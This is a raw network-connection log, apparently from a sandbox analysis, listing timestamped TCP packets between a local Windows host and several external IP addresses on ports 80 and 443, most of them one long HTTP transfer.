Dec 14, 2024 23:58:16.683098078 CET	49787	443	192.168.2.4	104.21.51.88
Dec 14, 2024 23:58:16.685791016 CET	49787	443	192.168.2.4	104.21.51.88
Dec 14, 2024 23:58:16.685868979 CET	443	49787	104.21.51.88	192.168.2.4
Dec 14, 2024 23:58:17.275780916 CET	80	49786	185.215.113.43	192.168.2.4
Dec 14, 2024 23:58:17.275991917 CET	49786	80	192.168.2.4	185.215.113.43
Dec 14, 2024 23:58:17.276766062 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:17.277079105 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:17.396780014 CET	80	49770	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:17.396797895 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:17.396847010 CET	49770	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:17.396899939 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:17.397052050 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:17.517062902 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:17.915240049 CET	443	49787	104.21.51.88	192.168.2.4
Dec 14, 2024 23:58:17.915572882 CET	49787	443	192.168.2.4	104.21.51.88
Dec 14, 2024 23:58:17.916809082 CET	49787	443	192.168.2.4	104.21.51.88
Dec 14, 2024 23:58:17.916835070 CET	443	49787	104.21.51.88	192.168.2.4
Dec 14, 2024 23:58:17.917367935 CET	443	49787	104.21.51.88	192.168.2.4
Dec 14, 2024 23:58:17.961236954 CET	49787	443	192.168.2.4	104.21.51.88
Dec 14, 2024 23:58:17.961237907 CET	49787	443	192.168.2.4	104.21.51.88
Dec 14, 2024 23:58:17.961399078 CET	443	49787	104.21.51.88	192.168.2.4
Dec 14, 2024 23:58:18.624706984 CET	443	49787	104.21.51.88	192.168.2.4
Dec 14, 2024 23:58:18.624819994 CET	443	49787	104.21.51.88	192.168.2.4
Dec 14, 2024 23:58:18.624991894 CET	49787	443	192.168.2.4	104.21.51.88
Dec 14, 2024 23:58:18.629559040 CET	49787	443	192.168.2.4	104.21.51.88
Dec 14, 2024 23:58:18.629590034 CET	443	49787	104.21.51.88	192.168.2.4
Dec 14, 2024 23:58:18.723081112 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.723154068 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.723319054 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.723351002 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.723365068 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.723367929 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.723438978 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.724030018 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.724045038 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.724060059 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.724090099 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.724123001 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.724786043 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.724802971 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.724823952 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.724843979 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.724843979 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.724878073 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.843019962 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.843107939 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.843352079 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.847116947 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.847645044 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.880031109 CET	49794	443	192.168.2.4	104.21.22.222
Dec 14, 2024 23:58:18.880115032 CET	443	49794	104.21.22.222	192.168.2.4
Dec 14, 2024 23:58:18.880201101 CET	49794	443	192.168.2.4	104.21.22.222
Dec 14, 2024 23:58:18.880521059 CET	49794	443	192.168.2.4	104.21.22.222
Dec 14, 2024 23:58:18.880551100 CET	443	49794	104.21.22.222	192.168.2.4
Dec 14, 2024 23:58:18.914836884 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.914985895 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.915003061 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.915062904 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.919079065 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.919157028 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.920627117 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.920696974 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.920748949 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.920875072 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.929029942 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.929138899 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.929209948 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.937426090 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.937480927 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.937536001 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.937587023 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.945797920 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.945868969 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.945921898 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.945970058 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.954408884 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.954472065 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.954474926 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.954524994 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.962616920 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.962680101 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.962749004 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.962922096 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.971036911 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.971107960 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.971173048 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.979356050 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.979410887 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.979465961 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.979511023 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.987087011 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.987140894 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.987200022 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.987251043 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:18.994787931 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.994894028 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:18.994956970 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.034898996 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.034915924 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.034976006 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.107115030 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.107228041 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.107353926 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.109591961 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.109699011 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.109756947 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.114135981 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.115833044 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.115926027 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.115993977 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.117446899 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.120476961 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.120589972 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.120646000 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.125106096 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.125241041 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.125328064 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.129615068 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.129734993 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.129807949 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.134095907 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.134223938 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.134275913 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.138629913 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.138716936 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.138772011 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.143071890 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.143177986 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.143245935 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.147572994 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.147687912 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.147744894 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.152062893 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.152170897 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.152225018 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.156593084 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.156748056 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.156802893 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.161143064 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.161225080 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.161295891 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.165549040 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.165685892 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.165745974 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.169081926 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.169133902 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.169188023 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.169398069 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.172524929 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.172576904 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.172647953 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.172697067 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.176047087 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.176172972 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.176229954 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.179573059 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.179698944 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.179757118 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.183139086 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.183254004 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.183304071 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.186521053 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.186681986 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.186764956 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.190053940 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.190149069 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.190210104 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.299211979 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.299359083 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.299408913 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.300601006 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.300661087 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.301083088 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.301134109 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.301178932 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.301261902 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.303900957 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.303957939 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.304088116 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.304128885 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.306706905 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.306757927 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.306813955 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.306870937 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.309497118 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.309658051 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.309711933 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.312155962 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.312218904 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.312277079 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.312530994 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.314753056 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.314812899 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.314866066 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.314919949 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.317379951 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.317461967 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.317524910 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.319848061 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.319907904 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.319973946 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.320024967 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.322339058 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.322398901 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.322478056 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.322521925 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.324877977 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.324937105 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.324990034 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.325177908 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.327395916 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.327465057 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.327517033 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.327564955 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.329936981 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.329992056 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.330065012 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.330167055 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.332468987 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.332537889 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.332741022 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.332796097 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.335000992 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.335062027 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.335129023 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.335197926 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.337532997 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.337589979 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.337645054 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.337805986 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.340039968 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.340146065 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.340204954 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.340565920 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.342562914 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.342624903 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.342684031 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.342721939 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.345084906 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.345136881 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.345194101 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.345243931 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.347642899 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.347704887 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.347771883 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.347932100 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.350224972 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.350276947 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.350362062 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.350447893 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.352727890 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.352780104 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.352875948 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.352955103 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.355180979 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.355351925 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.355412960 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.357718945 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.357778072 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.357851028 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.357996941 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.360364914 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.360407114 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.360420942 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.360451937 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.362802982 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.362854004 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.362921000 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.362991095 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.365457058 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.365533113 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.365539074 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.365590096 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.367898941 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.367960930 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.368098974 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.368160963 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.370450020 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.370500088 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.370661020 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.370836020 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.372944117 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.373003960 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.373073101 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.373267889 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.375478029 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.375539064 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.375566006 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.375986099 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.491503000 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.491576910 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.491686106 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.491754055 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.492610931 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.492717028 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.492747068 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.492806911 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.494791031 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.494852066 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.494935989 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.494993925 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.496923923 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.496980906 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.497018099 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.497065067 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.499068975 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.499124050 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.499161959 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.499212980 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.501122952 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.501177073 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.501245022 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.501296997 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.503197908 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.503249884 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.503304958 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.503601074 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.505235910 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.505304098 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.505373001 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.505480051 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.507344007 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.507405043 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.507462025 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.507751942 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.509352922 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.509407043 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.509491920 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.509546041 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.511425972 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.511485100 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.511573076 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.511647940 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.513504028 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.513617992 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.513653994 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.514123917 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.515594006 CET	80	49793	31.41.244.11	192.168.2.4
Dec 14, 2024 23:58:19.515661955 CET	49793	80	192.168.2.4	31.41.244.11
Dec 14, 2024 23:58:19.515737057 CET	80	49793	31.41.244.11	192.168.2.4
